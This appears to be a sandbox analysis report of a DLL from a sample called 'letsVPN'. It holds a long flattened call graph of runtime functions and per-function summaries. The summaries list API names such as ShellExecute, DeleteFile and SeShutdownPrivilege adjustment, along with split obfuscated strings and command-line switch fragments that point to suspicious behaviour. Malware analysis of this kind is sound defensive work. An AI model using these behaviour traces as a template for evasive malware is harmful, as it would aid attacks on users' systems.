16528->16530 16531 180016cfc _invalid_parameter_noinfo DecodePointer 16529->16531 16532 18001d70d _mbstowcs_l_helper 16530->16532 16537 18001d62e _mbstowcs_l_helper _commit 16530->16537 16531->16533 16532->16533 16534 180015dc8 _errno 5 API calls 16532->16534 16533->16510 16534->16533 16535 18001d6cb _mbstowcs_l_helper 16535->16533 16536 180015dc8 _errno 5 API calls 16535->16536 16536->16533 16537->16533 16537->16535 16538 18001b9cc _isleadbyte_l 18 API calls 16537->16538 16538->16537 16540 18001b81f 16539->16540 16541 18001a35c _getptd 18 API calls 16539->16541 16542 18001b848 16540->16542 16543 18001b83a 16540->16543 16541->16540 16552 18001b88c 16542->16552 16544 18001a35c _getptd 18 API calls 16543->16544 16545 18001b83f 16544->16545 16548 18001b880 16545->16548 16557 180010c94 16545->16557 16548->16463 16553 18001b866 16552->16553 16554 18001b89e __addlocaleref 16552->16554 16553->16545 16556 1800131e4 LeaveCriticalSection 16553->16556 16554->16553 16555 18001b5d8 __freetlocinfo 5 API calls 16554->16555 16555->16553 16558 180019254 _FF_MSGBANNER 9 API calls 16557->16558 16559 180010ca1 16558->16559 16560 1800192c8 _NMSG_WRITE 9 API calls 16559->16560 16561 180010ca8 16560->16561 16562 180010e70 doexit 10 API calls 16561->16562 16563 180010cb9 16562->16563 16565 18001d920 16564->16565 16566 18001d931 16565->16566 16567 18001d94a 16565->16567 16576 18001d925 _setmbcp_nolock 16565->16576 16569 180015dc8 _errno 5 API calls 16566->16569 16568 18001230c _LocaleUpdate::_LocaleUpdate 18 API calls 16567->16568 16570 18001d956 16568->16570 16571 18001d936 16569->16571 16572 18001db40 16570->16572 16573 18001d95f 16570->16573 16574 180016cfc _invalid_parameter_noinfo DecodePointer 16571->16574 16575 18001db86 WideCharToMultiByte 16572->16575 16581 18001db4d 16572->16581 16578 18001da37 WideCharToMultiByte 16573->16578 16582 18001d96c 16573->16582 16583 18001d9bd WideCharToMultiByte 16573->16583 16574->16576 16577 18001da6b 16575->16577 16576->16488 16577->16576 16580 
180015dc8 _errno 5 API calls 16577->16580 16578->16577 16587 18001da7e _commit 16578->16587 16580->16576 16581->16576 16584 180015dc8 _errno 5 API calls 16581->16584 16582->16576 16585 180015dc8 _errno 5 API calls 16582->16585 16583->16582 16584->16576 16585->16576 16586 18001daa0 WideCharToMultiByte 16586->16577 16586->16587 16587->16576 16587->16577 16587->16586 16615 18000e703 16614->16615 16616 180002a6a 16614->16616 16617 180015264 setlocale 22 API calls 16615->16617 16616->16388 16616->16389 16617->16616 16619 18000e984 16618->16619 16620 18000ea1a 16619->16620 16625 18000e9fa 16619->16625 16636 1800155f4 16619->16636 16621 1800155f4 _wfsopen 23 API calls 16620->16621 16620->16625 16623 18000ea3c 16621->16623 16623->16625 16653 180015580 16623->16653 16625->16282 16627 180001d1e std::_Lockit::_Lockit std::locale::_Init 16626->16627 16628 180001db4 std::locale::_Init 16627->16628 16864 1800043ec 16627->16864 16628->16284 16631 180001dee 16635 18000e538 std::_Facet_Register 8 API calls 16631->16635 16632 18001176c std::bad_exception::bad_exception 6 API calls 16633 180001ddd 16632->16633 16634 180011998 _CxxThrowException 2 API calls 16633->16634 16634->16631 16635->16628 16637 180015625 16636->16637 16638 18001563c 16636->16638 16639 180015dc8 _errno 5 API calls 16637->16639 16638->16637 16641 180015657 16638->16641 16640 18001562a 16639->16640 16642 180016cfc _invalid_parameter_noinfo DecodePointer 16640->16642 16662 18001dcfc 16641->16662 16652 180015635 _ioinit 16642->16652 16652->16620 16654 1800155a8 16653->16654 16655 1800155bd 16653->16655 16656 180015dc8 _errno 5 API calls 16654->16656 16655->16654 16657 1800155c3 16655->16657 16658 1800155ad 16656->16658 16725 1800154d4 16657->16725 16659 180016cfc _invalid_parameter_noinfo DecodePointer 16658->16659 16661 1800155b8 16659->16661 16661->16625 16670 18001dd15 16662->16670 16663 18001dd91 16696 1800131e4 LeaveCriticalSection 16663->16696 16666 18001dd9d 16666->16663 16693 180015828 16666->16693 16669 
18001ddce EnterCriticalSection 16669->16663 16670->16663 16670->16666 16687 1800102ec 16670->16687 16690 180010370 16670->16690 16688 18001030d EnterCriticalSection 16687->16688 16689 1800102fa 16687->16689 16689->16670 16691 180010382 LeaveCriticalSection 16690->16691 16692 180010375 16690->16692 16692->16691 16694 180015843 InitializeCriticalSectionAndSpinCount 16693->16694 16695 18001583c 16693->16695 16694->16669 16695->16694 16726 180015507 16725->16726 16727 1800154f7 16725->16727 16729 18001551a 16726->16729 16737 18001de34 16726->16737 16728 180015dc8 _errno 5 API calls 16727->16728 16731 1800154fc 16728->16731 16761 18000ee28 16729->16761 16731->16661 16738 18001de56 16737->16738 16739 18001de75 16738->16739 16740 18001de8d 16738->16740 16741 180015dc8 _errno 5 API calls 16739->16741 16742 180016d58 _fileno 6 API calls 16740->16742 16743 18001de7a 16741->16743 16744 18001de92 16742->16744 16745 180016cfc _invalid_parameter_noinfo DecodePointer 16743->16745 16746 18001e148 _lseek 12 API calls 16744->16746 16760 18001de85 _setmbcp_nolock 16745->16760 16747 18001deaa 16746->16747 16748 18001e023 16747->16748 16749 18001df05 16747->16749 16747->16760 16750 18001e027 16748->16750 16754 18001dff9 16748->16754 16752 18001df1a 16749->16752 16749->16754 16751 180015dc8 _errno 5 API calls 16750->16751 16751->16760 16752->16760 16791 1800182cc 16752->16791 16755 18001e148 _lseek 12 API calls 16754->16755 16754->16760 16756 18001e06d 16755->16756 16757 18001e148 _lseek 12 API calls 16756->16757 16756->16760 16757->16760 16758 18001df36 _ftelli64_nolock 16759 18001e148 _lseek 12 API calls 16758->16759 16758->16760 16759->16760 16760->16729 16762 18000ee45 16761->16762 16766 18000ee6a 16761->16766 16763 180016d58 _fileno 6 API calls 16762->16763 16762->16766 16764 18000ee5c 16763->16764 16834 180017010 16764->16834 16767 180016d58 16766->16767 16768 180016d61 16767->16768 16769 180015552 16767->16769 16770 180015dc8 _errno 5 API calls 16768->16770 16773 18001e148 
16769->16773 16771 180016d66 16770->16771 16772 180016cfc _invalid_parameter_noinfo DecodePointer 16771->16772 16772->16769 16774 18001e183 16773->16774 16775 18001e16b 16773->16775 16776 18001e1fc 16774->16776 16778 18001e1b6 16774->16778 16777 180015dc8 _errno 5 API calls 16775->16777 16780 180015dc8 _errno 5 API calls 16776->16780 16781 18001e178 16777->16781 16779 18001ea14 __lock_fhandle 3 API calls 16778->16779 16782 18001e1bd 16779->16782 16783 18001e209 16780->16783 16781->16731 16784 18001e1ca 16782->16784 16785 18001e1db 16782->16785 16786 180016cfc _invalid_parameter_noinfo DecodePointer 16783->16786 16850 18001e22c 16784->16850 16788 180015dc8 _errno 5 API calls 16785->16788 16786->16781 16789 18001e1d7 16788->16789 16863 18001ee74 LeaveCriticalSection 16789->16863 16792 1800182ef 16791->16792 16794 180018307 16791->16794 16796 180015dc8 _errno 5 API calls 16792->16796 16793 180018383 16797 180015dc8 _errno 5 API calls 16793->16797 16794->16793 16795 18001833a 16794->16795 16809 18001ea14 16795->16809 16808 1800182fc 16796->16808 16799 180018390 16797->16799 16801 180016cfc _invalid_parameter_noinfo DecodePointer 16799->16801 16800 180018341 16802 18001834e 16800->16802 16803 180018360 16800->16803 16801->16808 16815 1800183b4 16802->16815 16805 180015dc8 _errno 5 API calls 16803->16805 16806 18001835b 16805->16806 16824 18001ee74 LeaveCriticalSection 16806->16824 16808->16758 16810 18001ea80 EnterCriticalSection 16809->16810 16812 18001ea4c 16809->16812 16810->16800 16811 18001ea72 16825 1800131e4 LeaveCriticalSection 16811->16825 16812->16811 16813 180015828 _getstream InitializeCriticalSectionAndSpinCount 16812->16813 16813->16811 16826 18001ed50 16815->16826 16818 1800183ea SetFilePointerEx 16821 1800183de 16818->16821 16822 180018402 _commit 16818->16822 16819 1800183d9 16820 180015dc8 _errno 5 API calls 16819->16820 16820->16821 16821->16806 16823 180015d78 _dosmaperr 5 API calls 16822->16823 16823->16821 16827 18001ed59 16826->16827 16828 
18001ed6e 16826->16828 16829 180015dc8 _errno 5 API calls 16827->16829 16830 180015dc8 _errno 5 API calls 16828->16830 16831 1800183d3 16828->16831 16829->16831 16832 18001edb0 16830->16832 16831->16818 16831->16819 16833 180016cfc _invalid_parameter_noinfo DecodePointer 16832->16833 16833->16831 16835 180017033 16834->16835 16836 18001704b 16834->16836 16838 180015dc8 _errno 5 API calls 16835->16838 16837 1800170c4 16836->16837 16839 18001707e 16836->16839 16840 180015dc8 _errno 5 API calls 16837->16840 16848 180017040 16838->16848 16841 18001ea14 __lock_fhandle 3 API calls 16839->16841 16842 1800170d1 16840->16842 16843 180017085 16841->16843 16844 180016cfc _invalid_parameter_noinfo DecodePointer 16842->16844 16845 180015dc8 _errno 5 API calls 16843->16845 16846 180017092 16843->16846 16844->16848 16845->16846 16849 18001ee74 LeaveCriticalSection 16846->16849 16848->16766 16851 18001ed50 _get_osfhandle 6 API calls 16850->16851 16852 18001e250 16851->16852 16853 18001e259 16852->16853 16854 18001e26c SetFilePointerEx 16852->16854 16855 180015dc8 _errno 5 API calls 16853->16855 16856 18001e295 SetFilePointerEx 16854->16856 16859 18001e286 _commit 16854->16859 16862 18001e25e 16855->16862 16857 18001e2ad 16856->16857 16856->16859 16858 18001e2b4 SetFilePointerEx 16857->16858 16857->16862 16860 180015dc8 _errno 5 API calls 16858->16860 16861 180015d78 _dosmaperr 5 API calls 16859->16861 16860->16862 16861->16862 16862->16789 16865 180001dc6 16864->16865 16866 180004420 16864->16866 16865->16631 16865->16632 16866->16865 16867 18000eb24 std::ios_base::_Init 8 API calls 16866->16867 16869 18000442d 16867->16869 16868 180004465 16868->16865 16871 180002a5c messages 22 API calls 16868->16871 16869->16868 16870 18000234c std::_Locinfo::_Locinfo 24 API calls 16869->16870 16870->16868 16871->16865 16873 18000265e _NMSG_WRITE 16872->16873 16882 18000547c 16873->16882 16875 180002676 16889 1800023f8 16875->16889 16877 180002692 _setmbcp_nolock 16877->16294 16879 18000428f 
_setmbcp_nolock 16878->16879 16881 1800042a9 _setmbcp_nolock 16878->16881 16879->16881 16916 18000f688 16879->16916 16881->16303 16883 1800054e5 16882->16883 16885 180005499 16882->16885 16894 180004594 16883->16894 16885->16883 16886 1800054c0 16885->16886 16888 180005394 std::_System_error::_System_error 9 API calls 16886->16888 16887 1800054e3 _fwrite_nolock 16887->16875 16888->16887 16890 180005394 std::_System_error::_System_error 9 API calls 16889->16890 16891 180002449 std::_System_error::_System_error 16890->16891 16892 180011798 std::exception::exception 6 API calls 16891->16892 16893 18000247d _setmbcp_nolock 16892->16893 16893->16877 16895 180004651 16894->16895 16896 1800045bd 16894->16896 16907 18000e104 16895->16907 16900 1800045ce _fwrite_nolock 16896->16900 16901 180004024 16896->16901 16900->16887 16902 18000405d 16901->16902 16903 18000eb24 std::ios_base::_Init 8 API calls 16902->16903 16905 1800040aa 16902->16905 16906 1800040b7 _fwrite_nolock 16902->16906 16903->16905 16905->16906 16912 18000e0c0 16905->16912 16906->16900 16908 180011798 std::exception::exception 6 API calls 16907->16908 16909 18000e11c 16908->16909 16910 180011998 _CxxThrowException 2 API calls 16909->16910 16911 18000e139 16910->16911 16913 18000e0e5 std::_Xbad_alloc 16912->16913 16914 180011998 _CxxThrowException 2 API calls 16913->16914 16915 18000e102 16914->16915 16917 18000f6b2 16916->16917 16924 18000f6d3 16916->16924 16918 18000f6c3 16917->16918 16920 18000f6d5 16917->16920 16917->16924 16919 180015dc8 _errno 5 API calls 16918->16919 16921 18000f6c8 16919->16921 16925 18000f4f8 16920->16925 16922 180016cfc _invalid_parameter_noinfo DecodePointer 16921->16922 16922->16924 16924->16879 16928 18000f526 16925->16928 16931 18000f540 16925->16931 16926 18000f530 16927 180015dc8 _errno 5 API calls 16926->16927 16929 18000f535 16927->16929 16928->16926 16928->16931 16934 18000f572 _fwrite_nolock 16928->16934 16930 180016cfc _invalid_parameter_noinfo DecodePointer 16929->16930 
16930->16931 16931->16924 16932 18000ee28 _flush 9 API calls 16932->16934 16933 180016d58 _fileno 6 API calls 16933->16934 16934->16931 16934->16932 16934->16933 16935 180017010 _write 9 API calls 16934->16935 16935->16934 16942 1800052aa 16936->16942 16937 180005386 16939 18000e104 std::_System_error::_System_error 8 API calls 16937->16939 16938 18000530d 16941 180004660 9 API calls 16938->16941 16943 1800052d5 _fwrite_nolock 16938->16943 16940 180005392 16939->16940 16941->16943 16942->16937 16942->16938 16942->16943 16943->16223 16945 180004692 16944->16945 16946 180004728 16944->16946 16950 1800046a3 _fwrite_nolock 16945->16950 16951 180004128 16945->16951 16947 18000e104 std::_System_error::_System_error 8 API calls 16946->16947 16948 180004734 16947->16948 16948->16219 16950->16219 16953 180004166 16951->16953 16952 1800041c1 16955 18000e0c0 std::_Xbad_alloc 2 API calls 16952->16955 16956 1800041ce _fwrite_nolock 16952->16956 16953->16952 16954 18000eb24 std::ios_base::_Init 8 API calls 16953->16954 16953->16956 16954->16952 16955->16956 16956->16950 16958 1800077ba 16957->16958 16961 180007742 _fwrite_nolock 16957->16961 16959 18000e13c std::_System_error::_System_error 8 API calls 16958->16959 16960 1800077c6 16959->16960 16961->16238 16963 180011798 std::exception::exception 6 API calls 16962->16963 16964 18000e154 16963->16964 16965 180011998 _CxxThrowException 2 API calls 16964->16965 16966 18000e171 16965->16966 16968 18000810b 16967->16968 16975 1800080ba 16967->16975 16969 1800081d7 16968->16969 16970 180008118 16968->16970 16973 18000e13c std::_System_error::_System_error 8 API calls 16969->16973 16971 1800081e3 16970->16971 16972 180008128 16970->16972 16974 18000e104 std::_System_error::_System_error 8 API calls 16971->16974 16977 180004594 std::_System_error::_System_error 9 API calls 16972->16977 16980 180008106 _fwrite_nolock 16972->16980 16973->16971 16976 1800081f0 16974->16976 16975->16968 16978 1800080e1 16975->16978 16977->16980 16981 
180007f18 16978->16981 16980->16246 16982 180008080 16981->16982 16983 180007f49 16981->16983 16984 18000e13c std::_System_error::_System_error 8 API calls 16982->16984 16983->16982 16985 180008074 16983->16985 16986 180007f75 16983->16986 16998 18000808d 16984->16998 16987 18000e104 std::_System_error::_System_error 8 API calls 16985->16987 16988 180004594 std::_System_error::_System_error 9 API calls 16986->16988 17001 180007f90 _fwrite_nolock 16986->17001 16987->16982 16988->17001 16989 18000810b 16990 1800081d7 16989->16990 16991 180008118 16989->16991 16994 18000e13c std::_System_error::_System_error 8 API calls 16990->16994 16992 1800081e3 16991->16992 16993 180008128 16991->16993 16995 18000e104 std::_System_error::_System_error 8 API calls 16992->16995 16997 180004594 std::_System_error::_System_error 9 API calls 16993->16997 17002 180008106 _fwrite_nolock 16993->17002 16994->16992 16996 1800081f0 16995->16996 16997->17002 16998->16989 16999 1800080e1 16998->16999 17000 180007f18 9 API calls 16999->17000 17000->17002 17001->16980 17002->16980 17004 180002592 17003->17004 17005 18000127c 17004->17005 17011 180007a80 17004->17011 17005->16254 17005->16256 17008 180004c7c 17007->17008 17009 180004c40 17007->17009 17008->16257 17009->17008 17010 1800069ac std::ios_base::_Init 12 API calls 17009->17010 17010->17008 17012 180007aa5 17011->17012 17015 180007b0a 17011->17015 17013 180002560 12 API calls 17012->17013 17014 180007ab2 17013->17014 17017 1800069ac std::ios_base::_Init 12 API calls 17014->17017 17018 180007af6 17014->17018 17015->17005 17016 180004c20 12 API calls 17016->17015 17017->17018 17018->17015 17018->17016 17020 180002560 12 API calls 17019->17020 17021 180008d8f 17020->17021 17022 1800069ac std::ios_base::_Init 12 API calls 17021->17022 17023 180008e3b 17021->17023 17022->17023 17024 180001a8f 17023->17024 17025 180004c20 12 API calls 17023->17025 17024->16265 17025->17024 17026 1800246dc 17027 1800246ea 17026->17027 17028 180024724 _commit 
17026->17028 17027->17028 17055 180024290 17027->17055 17030 180015d78 _dosmaperr 5 API calls 17028->17030 17031 180024769 GetFileType 17028->17031 17032 18002475d 17030->17032 17033 1800247c2 17031->17033 17034 180015dc8 _errno 5 API calls 17032->17034 17061 18001edc4 17033->17061 17035 180024762 17034->17035 17035->17031 17042 180024a2a 17035->17042 17037 1800247e1 17038 1800183b4 _lseeki64_nolock 7 API calls 17037->17038 17040 180024a06 __termconin 17037->17040 17049 180024851 17037->17049 17038->17049 17041 180024290 __createFile 2 API calls 17040->17041 17040->17042 17045 180024ba7 _commit 17041->17045 17043 180017010 _write 9 API calls 17043->17049 17044 180024a1e 17047 180016e44 _close_nolock 6 API calls 17044->17047 17045->17042 17048 180015d78 _dosmaperr 5 API calls 17045->17048 17046 1800183b4 7 API calls _lseeki64_nolock 17046->17049 17050 180024a25 17047->17050 17051 180024bba 17048->17051 17049->17040 17049->17043 17049->17044 17049->17046 17065 180016e44 17049->17065 17052 180015dc8 _errno 5 API calls 17050->17052 17078 18001eca4 17051->17078 17052->17042 17054 180024bdc 17054->17054 17056 1800242b4 17055->17056 17057 180024333 CreateFileW 17056->17057 17058 1800242b8 GetModuleHandleW 17056->17058 17059 180024367 17057->17059 17060 1800242d5 _init_pointers 17058->17060 17059->17028 17060->17059 17062 18001ede0 17061->17062 17063 180015dc8 _errno 5 API calls 17062->17063 17064 18001ee0b _free_osfhnd 17062->17064 17063->17064 17064->17037 17066 18001ed50 _get_osfhandle 6 API calls 17065->17066 17067 180016e58 17066->17067 17071 18001ed50 _get_osfhandle 6 API calls 17067->17071 17076 180016e94 17067->17076 17077 180016ea0 __termconin _commit 17067->17077 17068 18001eca4 _free_osfhnd 5 API calls 17070 180016ec0 17068->17070 17069 18001ed50 _get_osfhandle 6 API calls 17069->17077 17073 180015d78 _dosmaperr 5 API calls 17070->17073 17075 180016eec 17070->17075 17072 180016e87 17071->17072 17074 18001ed50 _get_osfhandle 6 API calls 17072->17074 17073->17075 
17074->17076 17075->17049 17076->17069 17076->17077 17077->17068 17079 18001ecb8 17078->17079 17080 180015dc8 _errno 5 API calls 17079->17080 17081 18001ecea _free_osfhnd 17079->17081 17080->17081 17081->17054 17082 180012cbe 17083 180012cc3 _heap_init 17082->17083 17091 18001a4c8 17083->17091 17085 180012cd3 _RTC_Initialize 17086 180012ce3 GetCommandLineA 17085->17086 17102 18001d0a4 GetEnvironmentStringsW 17086->17102 17088 180012cf5 17110 180017a2c 17088->17110 17090 180012d01 17125 180010d70 EncodePointer 17091->17125 17093 18001a4d3 17131 180013180 17093->17131 17095 18001a4d8 17096 180015060 _calloc_crt 5 API calls 17095->17096 17101 18001a526 __security_init_cookie _mtterm 17095->17101 17097 18001a502 17096->17097 17097->17101 17135 18001580c 17097->17135 17101->17085 17103 18001d0d2 WideCharToMultiByte 17102->17103 17107 18001d161 __crtGetEnvironmentStringsA 17102->17107 17105 18001d121 17103->17105 17103->17107 17106 18001d131 WideCharToMultiByte 17105->17106 17105->17107 17106->17107 17108 18001d159 17106->17108 17107->17088 17109 180011058 free 5 API calls 17108->17109 17109->17107 17111 180017a5b 17110->17111 17112 180015060 _calloc_crt 5 API calls 17111->17112 17123 180017a6f _ioinit 17112->17123 17113 180017a7f _ioinit 17113->17090 17114 180017d2b 17139 1800131e4 LeaveCriticalSection 17114->17139 17116 180017c8e GetStdHandle 17118 180017cb9 GetFileType 17116->17118 17119 180017c46 17116->17119 17117 180015060 _calloc_crt 5 API calls 17117->17123 17118->17119 17119->17114 17119->17116 17122 180015828 _getstream InitializeCriticalSectionAndSpinCount 17119->17122 17120 180017b60 17120->17119 17121 180017be8 GetFileType 17120->17121 17124 180015828 _getstream InitializeCriticalSectionAndSpinCount 17120->17124 17121->17120 17122->17119 17123->17113 17123->17117 17123->17119 17123->17120 17124->17120 17126 180010d89 _init_pointers 17125->17126 17138 18001968c EncodePointer 17126->17138 17128 180010da9 _init_pointers 17129 1800158a0 GetModuleHandleW 
17128->17129 17130 1800158c6 _init_pointers 17129->17130 17130->17093 17132 18001319b 17131->17132 17133 180015828 _getstream InitializeCriticalSectionAndSpinCount 17132->17133 17134 1800131ce 17132->17134 17133->17132 17134->17095 17136 18001581c 17135->17136 17137 18001581f TlsSetValue 17135->17137 17136->17137 17138->17128 17140 1800076bf 17141 1800076c5 _commit 17140->17141 17142 1800076db 17141->17142 17149 180003cfc 17141->17149 17144 1800076d1 17147 180003bf4 GetTickCount64 Sleep SleepEx 17144->17147 17146 1800076d6 17146->17142 17148 180003c32 17147->17148 17148->17146 17150 180003d18 17149->17150 17151 180003d0f ExitProcess 17149->17151 17150->17144 17151->17150 17152 1800115e0 LoadLibraryExW 17153 180011605 _init_pointers 17152->17153 17154 18001163b ExitThread 17153->17154 17155 18001165b 17154->17155 17156 1800157f0 _getptd_noexit TlsGetValue 17155->17156 17157 180011662 17156->17157 17158 18001580c _mtinit TlsSetValue 17157->17158 17159 18001167b 17158->17159 17160 18001167f _commit 17159->17160 17162 18001168e __security_init_cookie 17159->17162 17161 180011685 ExitThread 17160->17161 17161->17162 17163 1800187bf WaitForSingleObject 17164 1800187d3 GetExitCodeProcess 17163->17164 17165 1800187ea _commit 17163->17165 17164->17165 17169 1800187e5 __termconin 17164->17169 17166 1800187f5 17165->17166 17167 18001880d _commit 17165->17167 17168 180015dc8 _errno 5 API calls 17166->17168 17170 180015d78 _dosmaperr 5 API calls 17167->17170 17168->17169 17170->17169 17171 1800030e0 17172 180003cfc ExitProcess 17171->17172 17173 1800030e9 17172->17173 17180 180003848 GetCurrentProcess OpenProcessToken 17173->17180 17175 1800030ee 17187 180011938 GetSystemTimeAsFileTime 17175->17187 17179 1800030fd 17181 18000389a LookupPrivilegeValueW 17180->17181 17182 180003893 _setmbcp_nolock __termconin 17180->17182 17181->17182 17183 1800038b1 AdjustTokenPrivileges 17181->17183 17182->17175 17183->17182 17184 1800038ed _commit 17183->17184 17184->17182 17192 180011498 
17184->17192 17188 1800030f5 17187->17188 17189 180011040 17188->17189 17190 18001a35c _getptd 18 API calls 17189->17190 17191 18001104d 17190->17191 17191->17179 17193 1800114c3 17192->17193 17194 1800114d8 17192->17194 17195 180015dc8 _errno 5 API calls 17193->17195 17196 180015060 _calloc_crt 5 API calls 17194->17196 17197 1800114c8 17195->17197 17198 1800114e7 17196->17198 17199 180016cfc _invalid_parameter_noinfo DecodePointer 17197->17199 17200 18001154f _commit 17198->17200 17202 18001a35c _getptd 18 API calls 17198->17202 17204 18000391a Sleep 17199->17204 17201 180011058 free 5 API calls 17200->17201 17203 18001155f 17201->17203 17205 1800114f4 17202->17205 17203->17204 17208 180015d78 _dosmaperr 5 API calls 17203->17208 17204->17182 17209 18001a404 17205->17209 17208->17204 17210 18001a46a 17209->17210 17215 1800131e4 LeaveCriticalSection 17210->17215 17212 18001a47f __addlocaleref 17213 1800131e4 _locterm LeaveCriticalSection 17212->17213 17214 180011503 CreateThread 17213->17214 17214->17200 17214->17204

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryLoadProcSleep$CreateDeleteDirectoryExecuteFileShell
                                                                                                                                                                                                    • String ID: 255$ sta$.0.0$1.0.$Dele$Shel$cute$lExe$leW$teFi$tic $~16
                                                                                                                                                                                                    • API String ID: 1872526433-501238091

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID: 1.0.$Dele$Shel$cute$lExe$leW$teFi$~16
                                                                                                                                                                                                    • API String ID: 790480582-1993818955

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocStringVariant$Init$Initialize$ClearClientCreateFromImpersonateInstanceProgSecurityUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3828289656-0

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesSleepValue_beginthreadex
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 1138004472-3733053543
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GlobalInfoMemoryStatusSystem
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 248183744-2766056989
APIs
Memory Dump Source
• Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: File$Pointer$Create
• String ID:
• API String ID: 250661774-0

Control-flow Graph (legend: Executed, Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID:
• String ID: p^f
• API String ID: 0-727254517

Control-flow Graph (legend: Executed, Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: lstrcat$DeleteExecuteFileFolderPathShellSleepSpecialwsprintf
• String ID: /F $ /d 0$ /t $ /v $@$p
• API String ID: 2901320441-719673316

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
